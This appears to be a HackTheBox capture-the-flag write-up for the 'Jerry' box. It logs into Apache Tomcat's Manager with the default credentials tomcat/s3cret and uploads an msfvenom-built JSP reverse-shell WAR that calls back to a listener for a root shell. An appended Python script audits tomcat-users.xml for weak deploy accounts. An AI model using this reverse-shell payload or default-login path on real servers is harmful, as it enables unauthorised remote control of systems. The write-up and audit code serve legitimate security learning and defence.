Jerry – HackTheBox Writeup

HackTheBox Writeup – Jerry (Windows) – Easy Difficulty

Introduction

I wanted to do an easy box to warm up. In my opinion though, this box was TOO easy. I don’t like the boxes where you only need to exploit one thing. On the simpler boxes, this becomes too simple, and on the harder boxes, they tend to make everything as hard as possible. Either way, it’s no fun!

Enumeration / Initial Foothold

Let’s start with RustScan.

rustscan 10.10.10.95 --range 1-65535 -- -A -sC -sV | tee nmap.txt

That’s fine – we know it’s Apache Tomcat, as we can see it from browsing to the site.

Clicking on any of the links triggers HTTP Basic Auth, and nothing default that comes to mind works.

We can fuzz the directories of the site using feroxbuster:

feroxbuster -u http://10.10.10.95:8080/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --quiet -o ferox.txt

This will reveal a page for us – /manager/html.

A user named tomcat and a password of s3cret? Well, this is an easy box, after all.

Clicking on the Manager App from before and using these creds takes us to the Web Application Manager.

Fortunately, I have exploited one of these before. These use WAR files – it’s very easy to create a reverse shell with msfvenom in WAR format:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f war -o revshell.war

We can spin up a listener on 4444 and upload it:

Then navigate to /revshell – instant reverse shell.

It’s instant root… That’s a little disappointing! I was looking forward to some privilege escalation.

Lessons Learned

  • Any credentials you find in error messages should be saved for later.
  • The simplest solution should always be tried first.
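
A defender's check for the weakness this box relied on, as an added example that is not part of the original writeup: it parses a tomcat-users.xml and flags accounts that can deploy WAR files through the Manager app while using a documented sample password or a trivially guessable one. The sample file, the password list, the length threshold and the function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample of conf/tomcat-users.xml (not taken from the box).
SAMPLE_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xk9!vR2#qLm8Tz4w" roles="manager-script"/>
  <user username="ops" password="ops" roles="manager-gui"/>
  <user username="monitor" password="monitor" roles="manager-status"/>
</tomcat-users>
"""

# Tomcat roles that permit deploying a WAR through the Manager application.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Illustrative list (an assumption): the sample password from this writeup
# plus a few common defaults. Extend it with your own wordlist.
KNOWN_PASSWORDS = {"s3cret", "tomcat", "admin", "password", "manager"}
MIN_LENGTH = 12  # assumed policy threshold


def audit_tomcat_users(xml_text):
    """Return (username, reason) findings for accounts that can deploy WARs."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        # Strip the XML namespace so files with and without xmlns both work.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        can_deploy = ",".join(sorted(roles & DEPLOY_ROLES))
        if not can_deploy:
            continue  # e.g. manager-status only: cannot upload applications
        if password.lower() in KNOWN_PASSWORDS:
            findings.append((name, "documented/default password with " + can_deploy))
        elif password.lower() == name.lower():
            findings.append((name, "password equals username with " + can_deploy))
        elif len(password) < MIN_LENGTH:
            findings.append((name, "short password with " + can_deploy))
    return findings


if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_USERS_XML):
        print(f"[!] {user}: {reason}")
```

Any account it reports is one guess away from the WAR upload shown above, so rotate the password and restrict access to /manager to an administrative network.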

Song Of The Day – Don’t Wanna Fall In Love by Jane Child